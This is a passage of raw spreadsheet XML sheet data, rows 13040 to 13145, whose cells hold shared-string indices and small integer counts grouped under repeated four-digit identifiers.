      </c>
      <c r="C13040">
        <v>0</v>
      </c>
      <c r="D13040">
        <v>5101</v>
      </c>
    </row>
    <row r="13041" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13041" t="s">
        <v>16230</v>
      </c>
      <c r="B13041" t="s">
        <v>16220</v>
      </c>
      <c r="C13041">
        <v>1</v>
      </c>
      <c r="D13041">
        <v>5101</v>
      </c>
    </row>
    <row r="13042" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13042" t="s">
        <v>16229</v>
      </c>
      <c r="B13042" t="s">
        <v>16221</v>
      </c>
      <c r="C13042">
        <v>0</v>
      </c>
      <c r="D13042">
        <v>5101</v>
      </c>
    </row>
    <row r="13043" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13043" t="s">
        <v>16230</v>
      </c>
      <c r="B13043" t="s">
        <v>16222</v>
      </c>
      <c r="C13043">
        <v>2</v>
      </c>
      <c r="D13043">
        <v>5101</v>
      </c>
    </row>
    <row r="13044" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13044" t="s">
        <v>16223</v>
      </c>
      <c r="B13044" t="s">
        <v>16223</v>
      </c>
      <c r="C13044">
        <v>25</v>
      </c>
      <c r="D13044">
        <v>5101</v>
      </c>
    </row>
    <row r="13045" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13045" t="s">
        <v>16224</v>
      </c>
      <c r="B13045" t="s">
        <v>16224</v>
      </c>
      <c r="C13045">
        <v>1</v>
      </c>
      <c r="D13045">
        <v>5101</v>
      </c>
    </row>
    <row r="13046" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13046" t="s">
        <v>16228</v>
      </c>
      <c r="B13046" t="s">
        <v>16211</v>
      </c>
      <c r="C13046">
        <v>0</v>
      </c>
      <c r="D13046">
        <v>5075</v>
      </c>
    </row>
    <row r="13047" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13047" t="s">
        <v>16231</v>
      </c>
      <c r="B13047" t="s">
        <v>16212</v>
      </c>
      <c r="C13047">
        <v>0</v>
      </c>
      <c r="D13047">
        <v>5075</v>
      </c>
    </row>
    <row r="13048" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13048" t="s">
        <v>16228</v>
      </c>
      <c r="B13048" t="s">
        <v>16213</v>
      </c>
      <c r="C13048">
        <v>0</v>
      </c>
      <c r="D13048">
        <v>5075</v>
      </c>
    </row>
    <row r="13049" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13049" t="s">
        <v>16231</v>
      </c>
      <c r="B13049" t="s">
        <v>16214</v>
      </c>
      <c r="C13049">
        <v>0</v>
      </c>
      <c r="D13049">
        <v>5075</v>
      </c>
    </row>
    <row r="13050" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13050" t="s">
        <v>16228</v>
      </c>
      <c r="B13050" t="s">
        <v>16215</v>
      </c>
      <c r="C13050">
        <v>1</v>
      </c>
      <c r="D13050">
        <v>5075</v>
      </c>
    </row>
    <row r="13051" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13051" t="s">
        <v>16231</v>
      </c>
      <c r="B13051" t="s">
        <v>16216</v>
      </c>
      <c r="C13051">
        <v>1</v>
      </c>
      <c r="D13051">
        <v>5075</v>
      </c>
    </row>
    <row r="13052" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13052" t="s">
        <v>16228</v>
      </c>
      <c r="B13052" t="s">
        <v>16217</v>
      </c>
      <c r="C13052">
        <v>0</v>
      </c>
      <c r="D13052">
        <v>5075</v>
      </c>
    </row>
    <row r="13053" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13053" t="s">
        <v>16231</v>
      </c>
      <c r="B13053" t="s">
        <v>16218</v>
      </c>
      <c r="C13053">
        <v>0</v>
      </c>
      <c r="D13053">
        <v>5075</v>
      </c>
    </row>
    <row r="13054" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13054" t="s">
        <v>16229</v>
      </c>
      <c r="B13054" t="s">
        <v>16219</v>
      </c>
      <c r="C13054">
        <v>0</v>
      </c>
      <c r="D13054">
        <v>5075</v>
      </c>
    </row>
    <row r="13055" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13055" t="s">
        <v>16230</v>
      </c>
      <c r="B13055" t="s">
        <v>16220</v>
      </c>
      <c r="C13055">
        <v>0</v>
      </c>
      <c r="D13055">
        <v>5075</v>
      </c>
    </row>
    <row r="13056" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13056" t="s">
        <v>16229</v>
      </c>
      <c r="B13056" t="s">
        <v>16221</v>
      </c>
      <c r="C13056">
        <v>0</v>
      </c>
      <c r="D13056">
        <v>5075</v>
      </c>
    </row>
    <row r="13057" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13057" t="s">
        <v>16230</v>
      </c>
      <c r="B13057" t="s">
        <v>16222</v>
      </c>
      <c r="C13057">
        <v>0</v>
      </c>
      <c r="D13057">
        <v>5075</v>
      </c>
    </row>
    <row r="13058" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13058" t="s">
        <v>16223</v>
      </c>
      <c r="B13058" t="s">
        <v>16223</v>
      </c>
      <c r="C13058">
        <v>0</v>
      </c>
      <c r="D13058">
        <v>5075</v>
      </c>
    </row>
    <row r="13059" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13059" t="s">
        <v>16224</v>
      </c>
      <c r="B13059" t="s">
        <v>16224</v>
      </c>
      <c r="C13059">
        <v>0</v>
      </c>
      <c r="D13059">
        <v>5075</v>
      </c>
    </row>
    <row r="13060" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13060" t="s">
        <v>16228</v>
      </c>
      <c r="B13060" t="s">
        <v>16211</v>
      </c>
      <c r="C13060">
        <v>0</v>
      </c>
      <c r="D13060">
        <v>4923</v>
      </c>
    </row>
    <row r="13061" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13061" t="s">
        <v>16231</v>
      </c>
      <c r="B13061" t="s">
        <v>16212</v>
      </c>
      <c r="C13061">
        <v>0</v>
      </c>
      <c r="D13061">
        <v>4923</v>
      </c>
    </row>
    <row r="13062" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13062" t="s">
        <v>16228</v>
      </c>
      <c r="B13062" t="s">
        <v>16213</v>
      </c>
      <c r="C13062">
        <v>0</v>
      </c>
      <c r="D13062">
        <v>4923</v>
      </c>
    </row>
    <row r="13063" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13063" t="s">
        <v>16231</v>
      </c>
      <c r="B13063" t="s">
        <v>16214</v>
      </c>
      <c r="C13063">
        <v>0</v>
      </c>
      <c r="D13063">
        <v>4923</v>
      </c>
    </row>
    <row r="13064" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13064" t="s">
        <v>16228</v>
      </c>
      <c r="B13064" t="s">
        <v>16215</v>
      </c>
      <c r="C13064">
        <v>1</v>
      </c>
      <c r="D13064">
        <v>4923</v>
      </c>
    </row>
    <row r="13065" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13065" t="s">
        <v>16231</v>
      </c>
      <c r="B13065" t="s">
        <v>16216</v>
      </c>
      <c r="C13065">
        <v>1</v>
      </c>
      <c r="D13065">
        <v>4923</v>
      </c>
    </row>
    <row r="13066" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13066" t="s">
        <v>16228</v>
      </c>
      <c r="B13066" t="s">
        <v>16217</v>
      </c>
      <c r="C13066">
        <v>3</v>
      </c>
      <c r="D13066">
        <v>4923</v>
      </c>
    </row>
    <row r="13067" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13067" t="s">
        <v>16231</v>
      </c>
      <c r="B13067" t="s">
        <v>16218</v>
      </c>
      <c r="C13067">
        <v>1</v>
      </c>
      <c r="D13067">
        <v>4923</v>
      </c>
    </row>
    <row r="13068" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13068" t="s">
        <v>16229</v>
      </c>
      <c r="B13068" t="s">
        <v>16219</v>
      </c>
      <c r="C13068">
        <v>0</v>
      </c>
      <c r="D13068">
        <v>4923</v>
      </c>
    </row>
    <row r="13069" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13069" t="s">
        <v>16230</v>
      </c>
      <c r="B13069" t="s">
        <v>16220</v>
      </c>
      <c r="C13069">
        <v>0</v>
      </c>
      <c r="D13069">
        <v>4923</v>
      </c>
    </row>
    <row r="13070" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13070" t="s">
        <v>16229</v>
      </c>
      <c r="B13070" t="s">
        <v>16221</v>
      </c>
      <c r="C13070">
        <v>2</v>
      </c>
      <c r="D13070">
        <v>4923</v>
      </c>
    </row>
    <row r="13071" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13071" t="s">
        <v>16230</v>
      </c>
      <c r="B13071" t="s">
        <v>16222</v>
      </c>
      <c r="C13071">
        <v>0</v>
      </c>
      <c r="D13071">
        <v>4923</v>
      </c>
    </row>
    <row r="13072" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13072" t="s">
        <v>16223</v>
      </c>
      <c r="B13072" t="s">
        <v>16223</v>
      </c>
      <c r="C13072">
        <v>20</v>
      </c>
      <c r="D13072">
        <v>4923</v>
      </c>
    </row>
    <row r="13073" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13073" t="s">
        <v>16224</v>
      </c>
      <c r="B13073" t="s">
        <v>16224</v>
      </c>
      <c r="C13073">
        <v>1</v>
      </c>
      <c r="D13073">
        <v>4923</v>
      </c>
    </row>
    <row r="13074" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13074" t="s">
        <v>16228</v>
      </c>
      <c r="B13074" t="s">
        <v>16211</v>
      </c>
      <c r="C13074">
        <v>0</v>
      </c>
      <c r="D13074">
        <v>5083</v>
      </c>
    </row>
    <row r="13075" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13075" t="s">
        <v>16231</v>
      </c>
      <c r="B13075" t="s">
        <v>16212</v>
      </c>
      <c r="C13075">
        <v>0</v>
      </c>
      <c r="D13075">
        <v>5083</v>
      </c>
    </row>
    <row r="13076" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13076" t="s">
        <v>16228</v>
      </c>
      <c r="B13076" t="s">
        <v>16213</v>
      </c>
      <c r="C13076">
        <v>0</v>
      </c>
      <c r="D13076">
        <v>5083</v>
      </c>
    </row>
    <row r="13077" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13077" t="s">
        <v>16231</v>
      </c>
      <c r="B13077" t="s">
        <v>16214</v>
      </c>
      <c r="C13077">
        <v>0</v>
      </c>
      <c r="D13077">
        <v>5083</v>
      </c>
    </row>
    <row r="13078" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13078" t="s">
        <v>16228</v>
      </c>
      <c r="B13078" t="s">
        <v>16215</v>
      </c>
      <c r="C13078">
        <v>1</v>
      </c>
      <c r="D13078">
        <v>5083</v>
      </c>
    </row>
    <row r="13079" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13079" t="s">
        <v>16231</v>
      </c>
      <c r="B13079" t="s">
        <v>16216</v>
      </c>
      <c r="C13079">
        <v>0</v>
      </c>
      <c r="D13079">
        <v>5083</v>
      </c>
    </row>
    <row r="13080" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13080" t="s">
        <v>16228</v>
      </c>
      <c r="B13080" t="s">
        <v>16217</v>
      </c>
      <c r="C13080">
        <v>0</v>
      </c>
      <c r="D13080">
        <v>5083</v>
      </c>
    </row>
    <row r="13081" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13081" t="s">
        <v>16231</v>
      </c>
      <c r="B13081" t="s">
        <v>16218</v>
      </c>
      <c r="C13081">
        <v>1</v>
      </c>
      <c r="D13081">
        <v>5083</v>
      </c>
    </row>
    <row r="13082" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13082" t="s">
        <v>16229</v>
      </c>
      <c r="B13082" t="s">
        <v>16219</v>
      </c>
      <c r="C13082">
        <v>0</v>
      </c>
      <c r="D13082">
        <v>5083</v>
      </c>
    </row>
    <row r="13083" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13083" t="s">
        <v>16230</v>
      </c>
      <c r="B13083" t="s">
        <v>16220</v>
      </c>
      <c r="C13083">
        <v>0</v>
      </c>
      <c r="D13083">
        <v>5083</v>
      </c>
    </row>
    <row r="13084" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13084" t="s">
        <v>16229</v>
      </c>
      <c r="B13084" t="s">
        <v>16221</v>
      </c>
      <c r="C13084">
        <v>0</v>
      </c>
      <c r="D13084">
        <v>5083</v>
      </c>
    </row>
    <row r="13085" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13085" t="s">
        <v>16230</v>
      </c>
      <c r="B13085" t="s">
        <v>16222</v>
      </c>
      <c r="C13085">
        <v>1</v>
      </c>
      <c r="D13085">
        <v>5083</v>
      </c>
    </row>
    <row r="13086" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13086" t="s">
        <v>16223</v>
      </c>
      <c r="B13086" t="s">
        <v>16223</v>
      </c>
      <c r="C13086">
        <v>24</v>
      </c>
      <c r="D13086">
        <v>5083</v>
      </c>
    </row>
    <row r="13087" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13087" t="s">
        <v>16224</v>
      </c>
      <c r="B13087" t="s">
        <v>16224</v>
      </c>
      <c r="C13087">
        <v>1</v>
      </c>
      <c r="D13087">
        <v>5083</v>
      </c>
    </row>
    <row r="13088" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13088" t="s">
        <v>16228</v>
      </c>
      <c r="B13088" t="s">
        <v>16211</v>
      </c>
      <c r="C13088">
        <v>0</v>
      </c>
      <c r="D13088">
        <v>5034</v>
      </c>
    </row>
    <row r="13089" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13089" t="s">
        <v>16231</v>
      </c>
      <c r="B13089" t="s">
        <v>16212</v>
      </c>
      <c r="C13089">
        <v>0</v>
      </c>
      <c r="D13089">
        <v>5034</v>
      </c>
    </row>
    <row r="13090" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13090" t="s">
        <v>16228</v>
      </c>
      <c r="B13090" t="s">
        <v>16213</v>
      </c>
      <c r="C13090">
        <v>0</v>
      </c>
      <c r="D13090">
        <v>5034</v>
      </c>
    </row>
    <row r="13091" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13091" t="s">
        <v>16231</v>
      </c>
      <c r="B13091" t="s">
        <v>16214</v>
      </c>
      <c r="C13091">
        <v>0</v>
      </c>
      <c r="D13091">
        <v>5034</v>
      </c>
    </row>
    <row r="13092" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13092" t="s">
        <v>16228</v>
      </c>
      <c r="B13092" t="s">
        <v>16215</v>
      </c>
      <c r="C13092">
        <v>5</v>
      </c>
      <c r="D13092">
        <v>5034</v>
      </c>
    </row>
    <row r="13093" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13093" t="s">
        <v>16231</v>
      </c>
      <c r="B13093" t="s">
        <v>16216</v>
      </c>
      <c r="C13093">
        <v>0</v>
      </c>
      <c r="D13093">
        <v>5034</v>
      </c>
    </row>
    <row r="13094" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13094" t="s">
        <v>16228</v>
      </c>
      <c r="B13094" t="s">
        <v>16217</v>
      </c>
      <c r="C13094">
        <v>2</v>
      </c>
      <c r="D13094">
        <v>5034</v>
      </c>
    </row>
    <row r="13095" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13095" t="s">
        <v>16231</v>
      </c>
      <c r="B13095" t="s">
        <v>16218</v>
      </c>
      <c r="C13095">
        <v>1</v>
      </c>
      <c r="D13095">
        <v>5034</v>
      </c>
    </row>
    <row r="13096" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13096" t="s">
        <v>16229</v>
      </c>
      <c r="B13096" t="s">
        <v>16219</v>
      </c>
      <c r="C13096">
        <v>0</v>
      </c>
      <c r="D13096">
        <v>5034</v>
      </c>
    </row>
    <row r="13097" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13097" t="s">
        <v>16230</v>
      </c>
      <c r="B13097" t="s">
        <v>16220</v>
      </c>
      <c r="C13097">
        <v>0</v>
      </c>
      <c r="D13097">
        <v>5034</v>
      </c>
    </row>
    <row r="13098" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13098" t="s">
        <v>16229</v>
      </c>
      <c r="B13098" t="s">
        <v>16221</v>
      </c>
      <c r="C13098">
        <v>2</v>
      </c>
      <c r="D13098">
        <v>5034</v>
      </c>
    </row>
    <row r="13099" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13099" t="s">
        <v>16230</v>
      </c>
      <c r="B13099" t="s">
        <v>16222</v>
      </c>
      <c r="C13099">
        <v>0</v>
      </c>
      <c r="D13099">
        <v>5034</v>
      </c>
    </row>
    <row r="13100" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13100" t="s">
        <v>16223</v>
      </c>
      <c r="B13100" t="s">
        <v>16223</v>
      </c>
      <c r="C13100">
        <v>14</v>
      </c>
      <c r="D13100">
        <v>5034</v>
      </c>
    </row>
    <row r="13101" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13101" t="s">
        <v>16224</v>
      </c>
      <c r="B13101" t="s">
        <v>16224</v>
      </c>
      <c r="C13101">
        <v>1</v>
      </c>
      <c r="D13101">
        <v>5034</v>
      </c>
    </row>
    <row r="13102" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13102" t="s">
        <v>16228</v>
      </c>
      <c r="B13102" t="s">
        <v>16211</v>
      </c>
      <c r="C13102">
        <v>0</v>
      </c>
      <c r="D13102">
        <v>5010</v>
      </c>
    </row>
    <row r="13103" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13103" t="s">
        <v>16231</v>
      </c>
      <c r="B13103" t="s">
        <v>16212</v>
      </c>
      <c r="C13103">
        <v>0</v>
      </c>
      <c r="D13103">
        <v>5010</v>
      </c>
    </row>
    <row r="13104" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13104" t="s">
        <v>16228</v>
      </c>
      <c r="B13104" t="s">
        <v>16213</v>
      </c>
      <c r="C13104">
        <v>0</v>
      </c>
      <c r="D13104">
        <v>5010</v>
      </c>
    </row>
    <row r="13105" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13105" t="s">
        <v>16231</v>
      </c>
      <c r="B13105" t="s">
        <v>16214</v>
      </c>
      <c r="C13105">
        <v>0</v>
      </c>
      <c r="D13105">
        <v>5010</v>
      </c>
    </row>
    <row r="13106" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13106" t="s">
        <v>16228</v>
      </c>
      <c r="B13106" t="s">
        <v>16215</v>
      </c>
      <c r="C13106">
        <v>2</v>
      </c>
      <c r="D13106">
        <v>5010</v>
      </c>
    </row>
    <row r="13107" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13107" t="s">
        <v>16231</v>
      </c>
      <c r="B13107" t="s">
        <v>16216</v>
      </c>
      <c r="C13107">
        <v>1</v>
      </c>
      <c r="D13107">
        <v>5010</v>
      </c>
    </row>
    <row r="13108" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13108" t="s">
        <v>16228</v>
      </c>
      <c r="B13108" t="s">
        <v>16217</v>
      </c>
      <c r="C13108">
        <v>2</v>
      </c>
      <c r="D13108">
        <v>5010</v>
      </c>
    </row>
    <row r="13109" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13109" t="s">
        <v>16231</v>
      </c>
      <c r="B13109" t="s">
        <v>16218</v>
      </c>
      <c r="C13109">
        <v>0</v>
      </c>
      <c r="D13109">
        <v>5010</v>
      </c>
    </row>
    <row r="13110" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13110" t="s">
        <v>16229</v>
      </c>
      <c r="B13110" t="s">
        <v>16219</v>
      </c>
      <c r="C13110">
        <v>0</v>
      </c>
      <c r="D13110">
        <v>5010</v>
      </c>
    </row>
    <row r="13111" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13111" t="s">
        <v>16230</v>
      </c>
      <c r="B13111" t="s">
        <v>16220</v>
      </c>
      <c r="C13111">
        <v>0</v>
      </c>
      <c r="D13111">
        <v>5010</v>
      </c>
    </row>
    <row r="13112" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13112" t="s">
        <v>16229</v>
      </c>
      <c r="B13112" t="s">
        <v>16221</v>
      </c>
      <c r="C13112">
        <v>8</v>
      </c>
      <c r="D13112">
        <v>5010</v>
      </c>
    </row>
    <row r="13113" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13113" t="s">
        <v>16230</v>
      </c>
      <c r="B13113" t="s">
        <v>16222</v>
      </c>
      <c r="C13113">
        <v>2</v>
      </c>
      <c r="D13113">
        <v>5010</v>
      </c>
    </row>
    <row r="13114" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13114" t="s">
        <v>16223</v>
      </c>
      <c r="B13114" t="s">
        <v>16223</v>
      </c>
      <c r="C13114">
        <v>26</v>
      </c>
      <c r="D13114">
        <v>5010</v>
      </c>
    </row>
    <row r="13115" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13115" t="s">
        <v>16224</v>
      </c>
      <c r="B13115" t="s">
        <v>16224</v>
      </c>
      <c r="C13115">
        <v>1</v>
      </c>
      <c r="D13115">
        <v>5010</v>
      </c>
    </row>
    <row r="13116" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13116" t="s">
        <v>16228</v>
      </c>
      <c r="B13116" t="s">
        <v>16211</v>
      </c>
      <c r="C13116">
        <v>0</v>
      </c>
      <c r="D13116">
        <v>4965</v>
      </c>
    </row>
    <row r="13117" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13117" t="s">
        <v>16231</v>
      </c>
      <c r="B13117" t="s">
        <v>16212</v>
      </c>
      <c r="C13117">
        <v>0</v>
      </c>
      <c r="D13117">
        <v>4965</v>
      </c>
    </row>
    <row r="13118" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13118" t="s">
        <v>16228</v>
      </c>
      <c r="B13118" t="s">
        <v>16213</v>
      </c>
      <c r="C13118">
        <v>0</v>
      </c>
      <c r="D13118">
        <v>4965</v>
      </c>
    </row>
    <row r="13119" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13119" t="s">
        <v>16231</v>
      </c>
      <c r="B13119" t="s">
        <v>16214</v>
      </c>
      <c r="C13119">
        <v>0</v>
      </c>
      <c r="D13119">
        <v>4965</v>
      </c>
    </row>
    <row r="13120" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13120" t="s">
        <v>16228</v>
      </c>
      <c r="B13120" t="s">
        <v>16215</v>
      </c>
      <c r="C13120">
        <v>2</v>
      </c>
      <c r="D13120">
        <v>4965</v>
      </c>
    </row>
    <row r="13121" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13121" t="s">
        <v>16231</v>
      </c>
      <c r="B13121" t="s">
        <v>16216</v>
      </c>
      <c r="C13121">
        <v>0</v>
      </c>
      <c r="D13121">
        <v>4965</v>
      </c>
    </row>
    <row r="13122" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13122" t="s">
        <v>16228</v>
      </c>
      <c r="B13122" t="s">
        <v>16217</v>
      </c>
      <c r="C13122">
        <v>0</v>
      </c>
      <c r="D13122">
        <v>4965</v>
      </c>
    </row>
    <row r="13123" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13123" t="s">
        <v>16231</v>
      </c>
      <c r="B13123" t="s">
        <v>16218</v>
      </c>
      <c r="C13123">
        <v>0</v>
      </c>
      <c r="D13123">
        <v>4965</v>
      </c>
    </row>
    <row r="13124" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13124" t="s">
        <v>16229</v>
      </c>
      <c r="B13124" t="s">
        <v>16219</v>
      </c>
      <c r="C13124">
        <v>3</v>
      </c>
      <c r="D13124">
        <v>4965</v>
      </c>
    </row>
    <row r="13125" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13125" t="s">
        <v>16230</v>
      </c>
      <c r="B13125" t="s">
        <v>16220</v>
      </c>
      <c r="C13125">
        <v>0</v>
      </c>
      <c r="D13125">
        <v>4965</v>
      </c>
    </row>
    <row r="13126" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13126" t="s">
        <v>16229</v>
      </c>
      <c r="B13126" t="s">
        <v>16221</v>
      </c>
      <c r="C13126">
        <v>0</v>
      </c>
      <c r="D13126">
        <v>4965</v>
      </c>
    </row>
    <row r="13127" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13127" t="s">
        <v>16230</v>
      </c>
      <c r="B13127" t="s">
        <v>16222</v>
      </c>
      <c r="C13127">
        <v>0</v>
      </c>
      <c r="D13127">
        <v>4965</v>
      </c>
    </row>
    <row r="13128" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13128" t="s">
        <v>16223</v>
      </c>
      <c r="B13128" t="s">
        <v>16223</v>
      </c>
      <c r="C13128">
        <v>27</v>
      </c>
      <c r="D13128">
        <v>4965</v>
      </c>
    </row>
    <row r="13129" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13129" t="s">
        <v>16224</v>
      </c>
      <c r="B13129" t="s">
        <v>16224</v>
      </c>
      <c r="C13129">
        <v>0</v>
      </c>
      <c r="D13129">
        <v>4965</v>
      </c>
    </row>
    <row r="13130" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13130" t="s">
        <v>16228</v>
      </c>
      <c r="B13130" t="s">
        <v>16211</v>
      </c>
      <c r="C13130">
        <v>0</v>
      </c>
      <c r="D13130">
        <v>5078</v>
      </c>
    </row>
    <row r="13131" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13131" t="s">
        <v>16231</v>
      </c>
      <c r="B13131" t="s">
        <v>16212</v>
      </c>
      <c r="C13131">
        <v>0</v>
      </c>
      <c r="D13131">
        <v>5078</v>
      </c>
    </row>
    <row r="13132" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13132" t="s">
        <v>16228</v>
      </c>
      <c r="B13132" t="s">
        <v>16213</v>
      </c>
      <c r="C13132">
        <v>0</v>
      </c>
      <c r="D13132">
        <v>5078</v>
      </c>
    </row>
    <row r="13133" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13133" t="s">
        <v>16231</v>
      </c>
      <c r="B13133" t="s">
        <v>16214</v>
      </c>
      <c r="C13133">
        <v>0</v>
      </c>
      <c r="D13133">
        <v>5078</v>
      </c>
    </row>
    <row r="13134" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13134" t="s">
        <v>16228</v>
      </c>
      <c r="B13134" t="s">
        <v>16215</v>
      </c>
      <c r="C13134">
        <v>1</v>
      </c>
      <c r="D13134">
        <v>5078</v>
      </c>
    </row>
    <row r="13135" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13135" t="s">
        <v>16231</v>
      </c>
      <c r="B13135" t="s">
        <v>16216</v>
      </c>
      <c r="C13135">
        <v>1</v>
      </c>
      <c r="D13135">
        <v>5078</v>
      </c>
    </row>
    <row r="13136" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13136" t="s">
        <v>16228</v>
      </c>
      <c r="B13136" t="s">
        <v>16217</v>
      </c>
      <c r="C13136">
        <v>0</v>
      </c>
      <c r="D13136">
        <v>5078</v>
      </c>
    </row>
    <row r="13137" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13137" t="s">
        <v>16231</v>
      </c>
      <c r="B13137" t="s">
        <v>16218</v>
      </c>
      <c r="C13137">
        <v>0</v>
      </c>
      <c r="D13137">
        <v>5078</v>
      </c>
    </row>
    <row r="13138" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13138" t="s">
        <v>16229</v>
      </c>
      <c r="B13138" t="s">
        <v>16219</v>
      </c>
      <c r="C13138">
        <v>0</v>
      </c>
      <c r="D13138">
        <v>5078</v>
      </c>
    </row>
    <row r="13139" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13139" t="s">
        <v>16230</v>
      </c>
      <c r="B13139" t="s">
        <v>16220</v>
      </c>
      <c r="C13139">
        <v>0</v>
      </c>
      <c r="D13139">
        <v>5078</v>
      </c>
    </row>
    <row r="13140" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13140" t="s">
        <v>16229</v>
      </c>
      <c r="B13140" t="s">
        <v>16221</v>
      </c>
      <c r="C13140">
        <v>0</v>
      </c>
      <c r="D13140">
        <v>5078</v>
      </c>
    </row>
    <row r="13141" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13141" t="s">
        <v>16230</v>
      </c>
      <c r="B13141" t="s">
        <v>16222</v>
      </c>
      <c r="C13141">
        <v>4</v>
      </c>
      <c r="D13141">
        <v>5078</v>
      </c>
    </row>
    <row r="13142" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13142" t="s">
        <v>16223</v>
      </c>
      <c r="B13142" t="s">
        <v>16223</v>
      </c>
      <c r="C13142">
        <v>25</v>
      </c>
      <c r="D13142">
        <v>5078</v>
      </c>
    </row>
    <row r="13143" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13143" t="s">
        <v>16224</v>
      </c>
      <c r="B13143" t="s">
        <v>16224</v>
      </c>
      <c r="C13143">
        <v>1</v>
      </c>
      <c r="D13143">
        <v>5078</v>
      </c>
    </row>
    <row r="13144" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13144" t="s">
        <v>16228</v>
      </c>
      <c r="B13144" t="s">
        <v>16211</v>
      </c>
      <c r="C13144">
        <v>0</v>
      </c>
      <c r="D13144">
        <v>1488</v>
      </c>
    </row>
    <row r="13145" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13145" t="s">
        <v>16231</v>
      </c>
